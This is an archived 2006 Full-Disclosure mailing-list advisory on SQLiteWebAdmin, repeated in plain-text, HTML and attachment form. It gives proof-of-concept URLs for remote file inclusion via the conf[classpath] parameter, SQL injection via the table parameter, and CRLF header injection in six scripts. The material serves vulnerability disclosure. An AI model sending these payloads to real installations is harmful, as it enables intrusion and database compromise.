[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] SQLiteWebAdmin multiple Vulnerabilities
From:       SirDarckCat <sirdarckcat () gmail ! com>
Date:       2006-07-30 4:43:39
Message-ID: 8ba534860607292143w7db874fft11bfa8cb7fdbbaba () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Discovered by Sirdarckcat from elhacker.net

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================

SQLiteWebAdmin is a simple script for managing a
DataBase.

It has several security bugs.

==============================================
Remote File Inclusion:


PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/
?

==============================================

SQLinjection:

PoC:
http://www.server.com/table_editfield.php?table='+[SQL]

==============================================

And also Header Injection:


PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value


==============================================

Att.
Sirdarckcat
elhacker.net


-- 
Att.
SirDarckCat@GMail.com

http://www.google.com/search?q=sirdarckcat

[Attachment #5 (text/html)]

<p>Discovered by Sirdarckcat from <a href="http://elhacker.net">elhacker.net</a></p>
<p>SQLiteWebAdmin<br><a \
href="http://sourceforge.net/projects/sqlitewebadmin">http://sourceforge.net/projects/sqlitewebadmin</a><br>==============================================</p>
 <p>SQLiteWebAdmin is a simple script for managing a<br>DataBase.</p>
<p>It has several security bugs.</p>
<p>==============================================<br>Remote File Inclusion:</p>
<p><br>PoC:<br><a href="http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google. \
com/">http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/</a>?</p> \
<p>==============================================</p> <p>SQLinjection:</p>
<p>PoC:<br><a href="http://www.server.com/table_editfield.php?table='+[SQL">http://www.server.com/table_editfield.php?table='+[SQL</a>]</p>
 <p>==============================================</p>
<p>And also Header Injection:</p>
<p><br>PoC:<br><a href="http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value</a></p>
 <p>PoC:<br><a href="http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value">http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value</a></p>
 <p>PoC:<br><a href="http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value</a></p>
 <p>PoC:<br><a href="http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value">http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value</a></p>
 <p>PoC:<br><a href="http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value">http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value</a></p>
 <p>PoC:<br><a href="http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value">http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value</a></p>
 <p><br>==============================================</p>
<p>Att.<br>Sirdarckcat<br><a href="http://elhacker.net">elhacker.net</a></p><br \
clear="all"><br>-- <br>Att.<br><a \
href="mailto:SirDarckCat@GMail.com">SirDarckCat@GMail.com</a><br><br><a \
href="http://www.google.com/search?q=sirdarckcat"> \
http://www.google.com/search?q=sirdarckcat</a> 


["sqlitewebadmin.txt" (text/plain)]

Discovered by Sirdarckcat from elhacker.net

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin
==============================================

SQLiteWebAdmin is a simple script for managing a
DataBase.

It has several security bugs.

==============================================
Remote File Inclusion:


PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?

==============================================

SQLinjection:

PoC:
http://www.server.com/table_editfield.php?table='+[SQL]

==============================================

And also Header Injection:


PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value

PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value


==============================================

Att.
Sirdarckcat
elhacker.net

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic